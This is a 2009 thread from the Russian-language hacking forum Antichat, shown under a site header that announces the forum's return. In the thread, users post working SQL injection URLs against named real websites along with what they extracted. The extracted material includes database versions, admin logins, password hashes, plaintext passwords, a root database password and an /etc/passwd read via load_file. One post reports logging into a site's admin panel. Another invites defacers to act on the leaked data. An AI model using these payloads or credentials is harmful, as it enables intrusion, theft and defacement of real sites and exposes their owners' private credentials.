Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
17.02.2009, 21:41
|
|
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181
Репутация:
688
|
|
PR - 5
Код:
http://www.mountain-riders.org/_news/news.php?id=-1+union+select+1,2,3,concat_ ws(0x3a,version(),database( ),user()),5,6,7,8,9--
Database Version : 4.0.25-standard-log
Database name : mountainriders
User name : mountainriders@10.0.63.118
не даёт она себя больше проскулить 
|
|
|
17.02.2009, 22:17
|
|
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948
Репутация:
325
|
|
uaflibrary.us - PR6
Код:
http://uaflibrary.us/onlinedatabases/ui/resource.php?id=276276%27+UNION+SELECT+1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*
DB_Ver:5.0.27-max-log
DB_User:rasmusonlib@localhost
DB:uafresources
5 ветка, просмотрев таблицы видим что есть еще WordPress в бд wp_rasmusondbs и табличка USERS в uafresources
зайти в вордпресс можно тут:
Код:
http://uaflibrary.us/blogs/highered/hec/wp-login.php
А вот к чему относится USERS не нашел(плохо искал наверное) =)
Вытаскиваем админа блога
Код:
http://uaflibrary.us/onlinedatabases/ui/resource.php?id=276276'+UNION+SELECT+1,2,3,4,5,6,7,concat_ws(0x3a,user_login,user_pass),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+FROM+wp_rasmusondbs.wp_users/*
admin:b29971a4ef9bd14d770bae9eefd5318d
|
|
|
|
17.02.2009, 22:18
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Код:
http://www.metropolis.ur.ru/dop.php?id=-1+union+select+concat_ws(0x3a,login,password),2,3,4+from+mtr_admin+--+
логин/пасс:
Код:
metro:370df69f54fc2368
--------------------------------------------------------
The End! |
|
|
|
17.02.2009, 23:44
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
http://www.mormota.ro/index.php?tart=101&alm=4&produs=1498+UNION+SELECT+ 1,2,3,concat_ws(0x3a,version(),database(),user()), 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--%20&cont=pscout
Database Version: 5.0.68-log
Database name: mormota
User name: mYmor@localhost
|
|
|
|
17.02.2009, 23:56
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Код:
http://www.santillana.com.gt/grupo/qs.php/?id=-14+union+select+1,version(),3/*
4.1.25-Debian_mt1-log
PR: 4 |
|
|
|
18.02.2009, 00:11
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973
Репутация:
466
|
|
http://www.dnkcity.dp.ua/contest/viev.php?id=82+UNION+SELECT+1,2,3,4,concat(user(), 0x3a,version()),6,7,8,9,10,11,12+LIMIT+1,1/*
есть PHPBB
Database Version: 5.0.45-log
Database name: dnkcityd_dnkcity
User name: dnkcityd@localhost
|
|
|
|
18.02.2009, 00:29
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964
Репутация:
302
|
|
Как вы думаете какой лучший спозоб защиты от взлома???
Код:
http://mzagzog.org/index.php?pg=say.php&pag=-1%20union%20select%201,concat_ws(0x3a,user_name,pass)%20from%20admin--
Сайт взломан
elassal:lookat9095 (логин пароль)
Админка
http://mzagzog.org/admin/
Логин и пароль подходят к админке... (А зайдите туды и скажите все таки какой способ защиты лучший))
|
|
|
|
18.02.2009, 05:43
|
|
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585
Репутация:
818
|
|
Короче всё кидаю в КВОТС, чтоб не сортировать:
landhaus.com.ua/news.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11
5.0.45-log
=
www.shoptraffic.com.ua/news.php?id=-3+UNION+SELECT+1,2,3,4,5,6
4.1.22-standard (магазин)
=
www.jean-jack.com.ua/news.php?id=-3+UNION+SELECT+1,2,3
5.0.44-log
=
ceramica.com.ua/news.php?id=-3+UNION+SELECT+1,2,3,4
5.0.41-community-log
=
www.sana-med.com.ua/news.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7,8
5.1.22-rc-log
9fed66b17b90086737f7718f83f2c6dd:admin (pass='a825kgg2')
fd0b92d4c80b798d554a50080e826e00:Админист атор
=
fit-terminal.com.ua/news.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11
5.0.45-log
редирект на Индекс, только через сканеры скуль.
=
salve.com.ua/news.php?id=-3+UNION+SELECT+1,2,3,4,5
http://salve.com.ua/news.php?id=-3+UNION+SELECT+1,2,concat(user,0x3a,pass),4,5+from +user
valera:4fd7b3202a2b2997e6ab124ec039422e
5.0.51a
=
panbud.com.ua/news.php?id=-3+UNION+SELECT+1,2,3
5.0.45-log
=
crimea.activelife.com.ua/news.php?id=-3+UNION+SELECT+1,2,3,4
4.1.22
=
www.unimed.com.ua/a-news/news.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7,8,9
4.1.22-log
3й сайт в Гугле
=
www.foros.com.ua/news.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7
5.0.67-community-log
Первый по гуглу
=
www.cipa.org.ua/ukr/news/news.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7
4.1.22
=
kievrealtor.org.ua/news.php?id=-3+UNION+SELECT+1,2,3,4
4.1.22-standard
http://kievrealtor.org.ua/news.php?id=-3+UNION+SELECT+1,concat(username,0x3a,pass),3,4+fr om+user+limit+0,1
vitalik:96656904e7aa6bf36b726ad9b93f13c6a81636ed
С правами:
=
zno-kharkiv.org.ua/news.php?id=-3+UNION+SELECT+1,2
http://zno-kharkiv.org.ua/news.php?id=-3+UNION+SELECT+1,file_priv+from+mysql.user
file_priv=Y
user()
siteuser@zno-kharkiv.org.ua
http://zno-kharkiv.org.ua/news.php?id=-3+UNION+SELECT+1,file_priv+from+mysql.user+where+u ser='siteuser'
file_priv=Y
ЗЫ vitalik:96656904e7aa6bf36b726ad9b93f13c6a81636ed
43 символа, что за хэш, я таких невстречал ?
Последний раз редактировалось b3; 18.02.2009 в 05:52..
|
|
|
|
18.02.2009, 06:45
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Game Happy - Счастливые игры :-)
Код:
gamehappy.ru/games/logic'+or+ascii(substring((select+table_name+from+information_schema.tables+limit+17,1),1,1))%3E'1/
|
|
|
|
18.02.2009, 13:25
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
обед
http://mis.lenoircc.edu/calendar/showevent.php3?id=-22740'+union+select+1,2,3,load_file('/etc/passwd'),5,6,7,8,9,10,11,12,13,14,15/*
Version:4.0.16
Dbname:wabash
User: root@localhost
$hostname = 'localhost';
$user = 'root';
$pass = 'rusty1';
Вперёёёдд, дефейсеры и другие дебилы...
зы: я потом логи просмотрю и выложу в болталке ;-)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
